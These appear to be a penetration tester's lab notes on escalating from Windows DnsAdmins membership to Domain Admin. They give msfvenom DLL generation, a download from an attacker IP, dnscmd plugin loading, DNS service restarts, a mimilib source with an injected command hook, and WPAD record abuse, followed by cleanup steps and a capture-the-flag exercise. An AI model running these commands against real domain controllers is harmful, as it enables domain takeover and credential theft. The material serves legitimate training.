12 - DnsAdmins Group

# Intro - Members of the [DnsAdmins](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#dnsadmins) group have access to DNS information on the network - The Windows DNS service supports custom plugins and can call functions from them to resolve name queries that are not in the scope of any locally hosted DNS zones - The Windows DNS service runs as `NT AUTHORITY\SYSTEM`, so membership in this group could potentially be leveraged to privesc on a DC or in a situation where a separate server is acting as the DNS server for the domain - It is possible to use the built-in [dnscmd](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd) utility to specify the path of the plugin DLL # Attack Leveraging `DnsAdmins` Group Membership - As detailed in this [post](https://adsecurity.org/?p=4064), the following attack can be performed when DNS is run on a DC: - DNS management is performed over RPC - [ServerLevelPluginDll](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dnsp/c9d38538-8827-44e6-aa5e-022a016ed723) allows us to load a custom DLL with zero verification of the DLL's path - This can be done with the `dnscmd` tool from the command line - When a member of the `DnsAdmins` group runs the `dnscmd` command below, the `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll` registry key is populated - When the DNS service is restarted, the DLL in this path will be loaded (i.e., a network share that the Domain Controller's machine account can access) - An attacker can load a custom DLL to obtain a reverse shell or even load a tool such as Mimikatz as a DLL to dump credentials # Attack Sequence - First, generate a malicious `.dll` with `msfvenom` that adds the `netadm` user to the `domain admins` ```bash msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll ``` - Next, serve up the payload from Kali and pull down on target ```powershell wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll" ``` - If we were to load the `.dll` as a non-privileged user, we would get an access denied error - Confirm group membership ```powershell Get-ADGroupMember -Identity DnsAdmins ``` - Load the malicious `.dll` with `dmscmd.exe` - Note: Specify the absolute path to the malicious `.dll` ```cmd dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll ``` - With the registry setting containing the path of our malicious plugin configured, and our payload created, the DLL will be loaded the next time the DNS service is started - Note: Membership in the `DnsAdmins` group doesn't give the ability to restart the DNS service, but this is conceivably something that sysadmins might permit DNS admins to do - After restarting the DNS service (if our user has this level of access), we should be able to run our custom DLL and add a user (in our case) or get a revshell - If we do not have access to restart the DNS server, we will have to wait until the server or service restarts - Next, we need to check our perms relative to the DNS Service - Below we will get the SID and then check perms on the DNS Service ```cmd wmic useraccount where name="netadm" get sid sc.exe sdshow DNS ``` - According to this [article](https://www.winhelponline.com/blog/view-edit-service-permissions-windows/), we can see that our user has `RPWP` permissions which translate to `SERVICE_START` and `SERVICE_STOP` - Now that we know that we can start/stop DNS Service, let's do just that with `sc.exe` ```cmd sc stop dns sc start dns ``` - If all went well, `netadm` should be a member of the domain admins group - Let's confirm ```cmd net group "Domain Admins" /dom ``` # Cleanup - Making config changes and stopping/restarting the DNS service on a DC are dangerous actions and must be exercised with great care - As a pentester, we need to obtain client permission before taking these steps because it could potentially take down DNS for an entire ADenvironment and cause many issues - First, confirm that the `ServerLevelPluginDll` registry key exists - Note: Until our custom DLL is removed, we will not be able to start the DNS service again correctly ```cmd reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters ``` - Now, delete the registry key that points to our custom DLL ```cmd reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll ``` - Start the DNS Service again and check status ```cmd sc.exe start dns sc.exe query dns ``` # Using `mimilib.dll` - As detailed in this [post](http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html), we could also utilize [mimilib.dll](https://github.com/gentilkiwi/mimikatz/tree/master/mimilib) (as shown below) from the creator of the `Mimikatz` tool to gain command execution by modifying the [kdns.c](https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c) file to execute a reverse shell one-liner or another command ```c /* Benjamin DELPY `gentilkiwi` https://blog.gentilkiwi.com [email protected] Licence : https://creativecommons.org/licenses/by/4.0/ */ #include "kdns.h" DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction) { return ERROR_SUCCESS; } DWORD WINAPI kdns_DnsPluginCleanup() { return ERROR_SUCCESS; } DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead) { FILE * kdns_logfile; #pragma warning(push) #pragma warning(disable:4996) if(kdns_logfile = _wfopen(L"kiwidns.log", L"a")) #pragma warning(pop) { klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType); fclose(kdns_logfile); system("ENTER COMMAND HERE"); } return ERROR_SUCCESS; } ``` # Creating a WPAD Record - Another way to abuse `DnsAdmins` group privileges is by creating a WPAD record - Membership in the `DnsAdmins` group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack - Server 2008 first introduced the ability to add to a global query block list on a DNS server - By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list - First, disable the global query block list ```powershell Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local ``` - Now, add a WPAD record pointing to Kali ```powershell Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3 ``` --- # Exercise - `ping` test ![[images/Pasted image 20260219195706.png]] - `nmap` scan ![[images/Pasted image 20260219195722.png]] - `rdp` into target with given creds - light internal enum ![[images/Pasted image 20260219195854.png]] - Note: `netadm` is a member of the `dnsadmins` group - Create malicious payload on Kali ```bash msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll ``` ![[images/Pasted image 20260219200009.png]] - Host malicious payload on Kali and `wget` on target ![[images/Pasted image 20260219200956.png]] ![[images/Pasted image 20260219201001.png]] - Confirm group membership and load malicious payload ![[images/Pasted image 20260219200253.png]] - Find SID for `netadmn` and check perms on DNS Service ![[images/Pasted image 20260219200403.png]] - We have RPWP perms - start+stop DNS Service ![[images/Pasted image 20260219200445.png]] - confirm group membership ![[images/Pasted image 20260219201519.png]] - next, sign out and restart `rdp` connection - confirm group memberships ![[images/Pasted image 20260219201752.png]] - now, `type c:\Users\Administrator\Desktop\DnsAdmins\flag.txt`